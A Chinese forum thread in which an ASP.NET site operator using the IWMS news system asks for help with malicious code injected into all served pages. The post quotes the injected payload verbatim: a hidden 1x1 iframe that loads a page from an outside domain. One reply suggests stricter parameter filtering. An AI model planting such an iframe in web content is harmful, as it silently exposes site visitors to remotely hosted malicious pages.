问题是这样的,我使用的是动网新闻系统也就是IWMS系统(ASP.NET)开发的,因为发现网站被注入了恶意代码,所以我重新装了系统,而且格式化了所有硬盘,之后服务器的安全也是做的非常好的,我在测试其他网站的时候都没有问题,而我把主站开通也就是用最新的这套系统,很快就又被注了恶意代码。恶意代码是不在网页文件本身里面的,也就是我放个HTML简单文件,里面的源文件是没有恶意代码的,可是访问这个页面,就会在这个页面插入了恶意代码。我估计是它利用了这套系统的漏洞直接注入到W3WP.EXE或者直接注入到FRAMEWORK的相关DLL了,不然全服务器几个站所有都被随机插了恶意代码。他插入的恶意代码的URL是:<iFrAmE SRc=http://mm.47555.com/k.htm width=1 height=1 frameborder=0></IfRaMe>高手去研究一下吧,这样的问题该如何解决,因为我这边的网站访问量比较大,1天10几万IP,希望大虾要帮忙一下,太感谢了。如果有知道如何解决这样的问题的高手也可以加我QQ:155717,再次表示感谢了。这个问题牵扯到ASP.NET和安全相关。
解决方案 »
- 怎么在源码模式插入UserControl
- 数据源控件读入数据和数据绑定发生在页面事件的哪一个阶段
- 求将HTML代码转换为UBB代码的c#正则表达式
- 现在要在.net中要将数据读出到excels 并且要按自己的要求显示在excels 中,可以通过应用程序读出也可以通过asp页面读出。格式如下:
- 无法在web服务器上启动调试,服务器因语法无效而未能处理调试请求!!
- 关于投票问题
- 问个DataGrid跨行表头的实现问题
- 关于htmlselect控件数据绑定的问题
- 无法将bool隐式转换成int,求大神看看
- Repeater模版列中如何动态添加checkbox控件?
- 招商
- 请问如何设置Calendar控件在最上面
加强参数过滤就可以解决